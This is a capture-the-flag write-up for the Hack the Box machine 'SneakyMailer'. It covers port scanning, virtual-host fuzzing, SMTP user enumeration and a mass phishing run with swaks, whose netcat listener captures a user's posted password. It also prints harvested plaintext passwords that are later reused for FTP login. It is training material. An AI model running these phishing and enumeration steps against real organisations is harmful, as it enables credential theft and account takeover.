Posts Hack the Box - SneakyMailer Writeup
Post
Cancel

Hack the Box - SneakyMailer Writeup

HTB - SneakyMailer

Overview

Descriptive information card on the machine sneakymailer

This machine is on TJ_Null’s list of OSCP-like machines. Have fun! Short description to include any strange things to be dealt with

Useful Skills and Tools

Save a transcript of any session (even remote nc sessions!)

  • With the command script $log_filename you can save the output of any session, including stderr and output from programs such as nano and vim! This is extremely invaluable when you exit a session and have forgotten to copy or backup something you did. To stop the transcript type exit after exiting any shells you may have spawned during that session.

Enumeration

Nmap scan

I started my enumeration with an nmap scan of 10.10.10.197. The options I regularly use are:

FlagPurpose
-p-A shortcut which tells nmap to scan all ports
-vvvGives very verbose output so I can see the results as they are found, and also includes some information not normally shown
-sCEquivalent to --script=default and runs a collection of nmap enumeration scripts against the target
-sVDoes a service version scan
-oA $nameSaves all three formats (standard, greppable, and XML) of output with a filename of $name
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ nmap -n -v -sCV -p- -oA sneakymailer 10.10.10.197
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-08 16:59 EST
Nmap scan report for 10.10.10.197

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: IMAP4rev1 STARTTLS OK IDLE THREAD=ORDEREDSUBJECT SORT ACL QUOTA UIDPLUS UTF8=ACCEPTA0001 NAMESPACE completed THREAD=REFERENCES CHILDREN CAPABILITY ENABLE ACL2=UNION
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: IMAP4rev1 OK IDLE THREAD=ORDEREDSUBJECT SORT ACL QUOTA UIDPLUS UTF8=ACCEPTA0001 NAMESPACE completed AUTH=PLAIN THREAD=REFERENCES CHILDREN CAPABILITY ENABLE ACL2=UNION
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 81.28 seconds

21,22,25,80,143,993,8080 open

Port 21 - FTP

1
2
3
4
5
6
7
8
9
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:zweilos): anonymous
530 Permission denied.
Login failed.
ftp> exit
221 Goodbye.

First I tried anonymous login through FTP, but was denied access.

Port 80 - HTTP

port 80 - redirected to http://sneakycorp.htb/ - added to /etc/hosts

After adding the domain name to /etc/hosts

I found the names Cara Stevens & Bradley Greer from the messages pop-up. Possible usernames can be extracted from these names using common business username patterns.

I also checked the page source code to see if there was anything interesting in the messages that couldn’t be seen in the previews, and found that Bradley Greer was my ‘personal tester’ and Cara Stevens was the owner of the company. Both seemed like good targets.

On the /team.php page there was a listing of company employees.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
Name    Position    Office    Email
Airi Satou     Accountant     Tokyo     airisatou@sneakymailer.htb
Angelica Ramos     Chief Executive Officer (CEO)     London     angelicaramos@sneakymailer.htb
Ashton Cox     Junior Technical Author     San Francisco     ashtoncox@sneakymailer.htb
Bradley Greer     Tester     London     bradleygreer@sneakymailer.htb
Brenden Wagner     Software Engineer     San Francisco     brendenwagner@sneakymailer.htb
Brielle Williamson     Tester     New York     briellewilliamson@sneakymailer.htb
Bruno Nash     Software Engineer     London     brunonash@sneakymailer.htb
Caesar Vance     Tester     New York     caesarvance@sneakymailer.htb
Cara Stevens     Sales Assistant     New York     carastevens@sneakymailer.htb
Cedric Kelly     Senior Javascript Developer     Edinburgh     cedrickelly@sneakymailer.htb
Charde Marshall     Tester     San Francisco     chardemarshall@sneakymailer.htb
Colleen Hurst     Javascript Developer     San Francisco     colleenhurst@sneakymailer.htb
Dai Rios     Personnel Lead     Edinburgh     dairios@sneakymailer.htb
Donna Snider     Customer Support     New York     donnasnider@sneakymailer.htb
Doris Wilder     Sales Assistant     Sidney     doriswilder@sneakymailer.htb
Finn Camacho     Support Engineer     San Francisco     finncamacho@sneakymailer.htb
Fiona Green     Tester     San Francisco     fionagreen@sneakymailer.htb
Garrett Winters     Accountant     Tokyo     garrettwinters@sneakymailer.htb
Gavin Cortez     Team Leader     San Francisco     gavincortez@sneakymailer.htb
Gavin Joyce     Developer     Edinburgh     gavinjoyce@sneakymailer.htb
Gloria Little     Systems Administrator     New York     glorialittle@sneakymailer.htb
Haley Kennedy     Tester     London     haleykennedy@sneakymailer.htb
Hermione Butler     Regional Director     London     hermionebutler@sneakymailer.htb
Herrod Chandler     Tester     San Francisco     herrodchandler@sneakymailer.htb
Hope Fuentes     Secretary     San Francisco     hopefuentes@sneakymailer.htb
Howard Hatfield     Office Manager     San Francisco     howardhatfield@sneakymailer.htb
Jackson Bradshaw     Director     New York     jacksonbradshaw@sneakymailer.htb
Jena Gaines     Office Manager     London     jenagaines@sneakymailer.htb
Jenette Caldwell     Development Lead     New York     jenettecaldwell@sneakymailer.htb
Jennifer Acosta     Junior Javascript Developer     Edinburgh     jenniferacosta@sneakymailer.htb
Jennifer Chang     Regional Director     Singapore     jenniferchang@sneakymailer.htb
Jonas Alexander     Developer     San Francisco     jonasalexander@sneakymailer.htb
Lael Greer     Systems Administrator     London     laelgreer@sneakymailer.htb
Martena Mccray     Post-Sales support     Edinburgh     martenamccray@sneakymailer.htb
Michael Silva     Marketing Designer     London     michaelsilva@sneakymailer.htb
Michelle House     Integration Specialist     Sidney     michellehouse@sneakymailer.htb
Olivia Liang     Support Engineer     Singapore     olivialiang@sneakymailer.htb
Paul Byrd     Tester     New York     paulbyrd@sneakymailer.htb
Prescott Bartlett     Technical Author     London     prescottbartlett@sneakymailer.htb
Quinn Flynn     Support Lead     Edinburgh     quinnflynn@sneakymailer.htb
Rhona Davidson     Integration Specialist     Tokyo     rhonadavidson@sneakymailer.htb
Sakura Yamamoto     Support Engineer     Tokyo     sakurayamamoto@sneakymailer.htb
Serge Baldwin     Data Coordinator     Singapore     sergebaldwin@sneakymailer.htb
Shad Decker     Regional Director     Edinburgh     shaddecker@sneakymailer.htb
Shou Itou     Regional Marketing     Tokyo     shouitou@sneakymailer.htb
Sonya Frost     Tester     Edinburgh     sonyafrost@sneakymailer.htb
Suki Burks     Developer     London     sukiburks@sneakymailer.htb
sulcud     The new guy     Freelance     sulcud@sneakymailer.htb
Tatyana Fitzpatrick     Regional Director     London     tatyanafitzpatrick@sneakymailer.htb
Thor Walton     Developer     New York     thorwalton@sneakymailer.htb
Tiger Nixon     System Architect     Edinburgh     tigernixon@sneakymailer.htb
Timothy Mooney     Office Manager     London     timothymooney@sneakymailer.htb
Unity Butler     Marketing Designer     San Francisco     unitybutler@sneakymailer.htb
Vivian Harrell     Financial Controller     San Francisco     vivianharrell@sneakymailer.htb
Yuri Berry     Chief Marketing Officer (CMO)     New York     yuriberry@sneakymailer.htb
Zenaida Frank     Software Engineer     New York     zenaidafrank@sneakymailer.htb
Zorita Serrano     Software Engineer     San Francisco     zoritaserrano@sneakymailer.htb

There was a huge list of employees at the company. I added the usernames and emails to lists for later use

I found out afterwards that there is a nice tool that can extract emails from a page: https://email-checker.net/extract

In the source code of the page I also found a reference to a register page at /pypi/register.php.

Dirbuster also found this page shortly afterwards, though there wasn’t much else to look through.

I navigated to this register page and tried to create an account, however it did not seem to be functional.

typing in pypi.sneakycorp.htb redirects to the main page, loaded ffuf to see if I could find any other virtual hosts

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://FUZZ.sneakycorp.htb/ -c                     

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://FUZZ.sneakycorp.htb/
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

dev                     [Status: 200, Size: 13737, Words: 4007, Lines: 341]

on dev.sneakycorp.htb found a site that was almost identical to main page, though the register page was visible in a link here.

Tried to register again

Port 8080 - HTTP

Decided to check out the port 8080 on each of the virtual hosts, dev did not lead anywhere

, but pypi did: http://pypi.sneakycorp.htb:8080/

found pypiserver version 1.3.2 - newest is 1.4.2

https://blog.pentesteracademy.com/learn-to-interact-with-pypi-server-in-3-minutes-71d45fa46273

Port 25 - SMTP

Verifying valid email addresses

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ telnet sneakycorp.htb 25                                                                        1 ⨯
Trying 10.10.10.197...
Connected to sneakycorp.htb.
Escape character is '^]'.
HELO
220 debian ESMTP Postfix (Debian/GNU)
501 Syntax: HELO hostname
HELO sneakycorp.htb
250 debian
MAIL FROM:zweilos@sneakycorp.htb
250 2.1.0 Ok
RCPT TO:bradleygreer@sneakymailer.htb
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
This is a test!    


.
250 2.0.0 Ok: queued as 155A82467F
VRFY root
252 2.0.0 root
vrfy test
550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table
VRFY bradleygreer@sneakymailer.htb
252 2.0.0 bradleygreer@sneakymailer.htb
VRFY carastevens@sneakymailer.htb
252 2.0.0 carastevens@sneakymailer.htb
VRFY airisatou@sneakymailer.htb
252 2.0.0 airisatou@sneakymailer.htb
QUIT
221 2.0.0 Bye
Connection closed by foreign host.

https://www.interserver.net/tips/kb/check-email-address-really-exists-without-sending-email/ https://www.mailenable.com/kb/content/article.asp?ID=ME020207 Sent an email to my personal tester greer-san… tested a few addresses, all seem valid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf5 exploit(multi/handler) > use smtp_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_enum                   normal  No     SMTP User Enumeration Utility


[*] Using auxiliary/scanner/smtp/smtp_enum
msf5 auxiliary(scanner/smtp/smtp_enum) > options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOSTS     10.10.10.193                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      25                                                             yes       The target port (TCP)
   THREADS    1                                                              yes       The number of concurrent threads (max one per host)
   UNIXONLY   true                                                           yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf5 auxiliary(scanner/smtp/smtp_enum) > set rhosts 10.10.10.197
rhosts => 10.10.10.197
msf5 auxiliary(scanner/smtp/smtp_enum) > run


[*] 10.10.10.197:25       - 10.10.10.197:25 Banner: 220 debian ESMTP Postfix (Debian/GNU)
[+] 10.10.10.197:25       - 10.10.10.197:25 Users found: , _apt, avahi-autoipd, backup, bin, daemon, ftp, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, systemd-coredump, systemd-network, systemd-resolve, systemd-timesync, uucp, www-data
[*] 10.10.10.197:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE users
USER_FILE => users
msf5 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.10.197:25       - 10.10.10.197:25 Banner: 220 debian ESMTP Postfix (Debian/GNU)
[+] 10.10.10.197:25       - 10.10.10.197:25 Users found: airisatou@sneakymailer.htb, angelicaramos@sneakymailer.htb, ashtoncox@sneakymailer.htb, bradleygreer@sneakymailer.htb, brendenwagner@sneakymailer.htb, briellewilliamson@sneakymailer.htb, brunonash@sneakymailer.htb, caesarvance@sneakymailer.htb, carastevens@sneakymailer.htb, cedrickelly@sneakymailer.htb, chardemarshall@sneakymailer.htb, colleenhurst@sneakymailer.htb, dairios@sneakymailer.htb, donnasnider@sneakymailer.htb, doriswilder@sneakymailer.htb, finncamacho@sneakymailer.htb, fionagreen@sneakymailer.htb, garrettwinters@sneakymailer.htb, gavincortez@sneakymailer.htb, gavinjoyce@sneakymailer.htb, glorialittle@sneakymailer.htb, haleykennedy@sneakymailer.htb, hermionebutler@sneakymailer.htb, herrodchandler@sneakymailer.htb, hopefuentes@sneakymailer.htb, howardhatfield@sneakymailer.htb, jacksonbradshaw@sneakymailer.htb, jenagaines@sneakymailer.htb, jenettecaldwell@sneakymailer.htb, jenniferacosta@sneakymailer.htb, jenniferchang@sneakymailer.htb, jonasalexander@sneakymailer.htb, laelgreer@sneakymailer.htb, martenamccray@sneakymailer.htb, michaelsilva@sneakymailer.htb, michellehouse@sneakymailer.htb, olivialiang@sneakymailer.htb, paulbyrd@sneakymailer.htb, prescottbartlett@sneakymailer.htb, quinnflynn@sneakymailer.htb, rhonadavidson@sneakymailer.htb, sakurayamamoto@sneakymailer.htb, sergebaldwin@sneakymailer.htb, shaddecker@sneakymailer.htb, shouitou@sneakymailer.htb, sonyafrost@sneakymailer.htb, sukiburks@sneakymailer.htb, sulcud@sneakymailer.htb, tatyanafitzpatrick@sneakymailer.htb, thorwalton@sneakymailer.htb, tigernixon@sneakymailer.htb, timothymooney@sneakymailer.htb, unitybutler@sneakymailer.htb, vivianharrell@sneakymailer.htb, yuriberry@sneakymailer.htb, zenaidafrank@sneakymailer.htb, zoritaserrano@sneakymailer.htb
[*] 10.10.10.197:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

verified all the usernames

Sending a phishing email with SMTP

Searched how to interact with SMTP through command line - https://github.com/jetmore/swaks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ for address in $(cat users); do swaks --helo sneakycorp.htb \
--to $address --from zweilos@sneakymailer.htb --header "Subject: Check this out" \
--body "Check this out! http://10.10.15.100:8090/" --server 10.10.10.197; done
  
=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<zweilos@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<airisatou@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Sun, 08 Nov 2020 21:03:55 -0500
 -> To: airisatou@sneakymailer.htb
 -> From: zweilos@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201108210355.081776@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out! http://10.10.15.100:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as B850724954
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.
=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<zweilos@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<angelicaramos@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Sun, 08 Nov 2020 21:04:05 -0500
 -> To: angelicaramos@sneakymailer.htb
 -> From: zweilos@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201108210405.081780@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out! http://10.10.15.100:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as 3A9A124956
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

no reply, so maybe try working local address? also put the “link” on a new line in case whatever script cant parse it for some reason (maybe the !?)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ for address in $(cat users); do swaks --helo sneakycorp.htb \
--to $address --from root@sneakymailer.htb --header "Subject: Check this out" \
--body "Check this out. \nhttp://10.10.15.100:8090/" --server 10.10.10.197; done 

=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<root@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<airisatou@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Sun, 08 Nov 2020 21:22:30 -0500
 -> To: airisatou@sneakymailer.htb
 -> From: root@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201108212230.082099@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out! 
 -> http://10.10.15.100:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as 5A9CF249C9
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

...snipped...

=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<root@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<zenaidafrank@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Wed, 11 Nov 2020 11:19:46 -0500
 -> To: zenaidafrank@sneakymailer.htb
 -> From: root@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201111111946.150282@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out 
 -> http://10.10.14.174:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as C831324848
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.
=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<root@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<zoritaserrano@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Wed, 11 Nov 2020 11:19:57 -0500
 -> To: zoritaserrano@sneakymailer.htb
 -> From: root@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201111111957.150283@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out 
 -> http://10.10.14.174:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as 408FC2484A
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

going to try restting box since getting no replies to phishing email, also remove ! from body to see if that causing issues

Was doing packet capture the whole time trying to see if my messages were being sent/recieved, and finally got a reply back from one

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ nc -lvnp 8090                                                                                  1 ⨯
listening on [any] 8090 ...
connect to [10.10.14.174] from (UNKNOWN) [10.10.10.197] 51434
POST / HTTP/1.1
Host: 10.10.14.174:8090
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

Got a click! The user Paul Byrd clicked on my link and gave me a (URL-encoded) password.

1
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

This decoded to give me a (super-complicated) password of:

1
^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Reading Paul’s mail

Since Paul was nice enough to send me his email password, I decided to log into his mailbox to see what kind of information I could find

I put in the account information for Paul into my email client and pointed the server towards the target.

After logging into the mailbox I noticed there wasn’t anything in the inbox (probably emptied regularly to keep other players from accidentally clicking on each other’s phishing email links). There were two messages in the Sent items folder, however. The first was an email to the administrator root@debian asking them to change the password for the developer account. He was nice enough to send the old password m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C as well. I made sure to take note of this in case it was used anywhere, or in case the admin hadn’t changed it yet.

The second email was addressed to low, which I thought was another potential username on the machine. The message laid out a task to “install, test, and then erase” all of the modules in the PyPI service. I hoped that perhaps Paul had created a script to automate this action, and that I could possibly get it to execute a module I somehow got installed to the service.

1
2
3
4
5
6
Hello administrator, I want to change this password for the developer account

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C 

Please notify me when you do it

Since I now had credentials, I though it would most likely log into the PyPI server I found earlier.

nothing in packages

nor in the index page

However, this did not work, nor did logging into SSH. I checked back with my nmap scan to see if there were any other services I could try, and noticed port 21 - FTP was open, so I gave it a try.

FTP Enumeration

1
2
3
4
5
6
7
8
9
10
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ ftp 10.10.10.197                                                                              255 ⨯
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:zweilos): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Using the credentials I had found for the delevoper account I was able to login through FTP.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Nov 11 09:16 dev
226 Directory send OK.
ftp> cd dev
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 18:52 css
drwxr-xr-x    2 0        0            4096 May 26 18:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 08:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 18:52 js
drwxr-xr-x    2 0        0            4096 May 26 18:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 18:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 19:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 18:52 vendor
226 Directory send OK.
ftp> get team.php
local: team.php remote: team.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for team.php (26523 bytes).
226 Transfer complete.
26523 bytes received in 0.05 secs (557.8464 kB/s)
ftp> cd pypi
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            3115 May 26 18:52 register.php
226 Directory send OK.
ftp> get register.php
local: register.php remote: register.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for register.php (3115 bytes).
226 Transfer complete.
3115 bytes received in 0.00 secs (52.1175 MB/s)
ftp> cd ../vendor
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 May 26 18:52 bootstrap
drwxr-xr-x    2 0        0            4096 May 26 18:52 chart.js
drwxr-xr-x    2 0        0            4096 May 26 18:52 datatables
drwxr-xr-x   10 0        0            4096 May 26 18:52 fontawesome-free
drwxr-xr-x    2 0        0            4096 May 26 18:52 jquery
drwxr-xr-x    2 0        0            4096 May 26 18:52 jquery-easing
226 Directory send OK.
ftp> cd datatables
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            5799 May 26 18:52 dataTables.bootstrap4.css
-rwxr-xr-x    1 0        0            4693 May 26 18:52 dataTables.bootstrap4.js
-rwxr-xr-x    1 0        0            5222 May 26 18:52 dataTables.bootstrap4.min.css
-rwxr-xr-x    1 0        0            2085 May 26 18:52 dataTables.bootstrap4.min.js
-rwxr-xr-x    1 0        0          448564 May 26 18:52 jquery.dataTables.js
-rwxr-xr-x    1 0        0           82650 May 26 18:52 jquery.dataTables.min.js
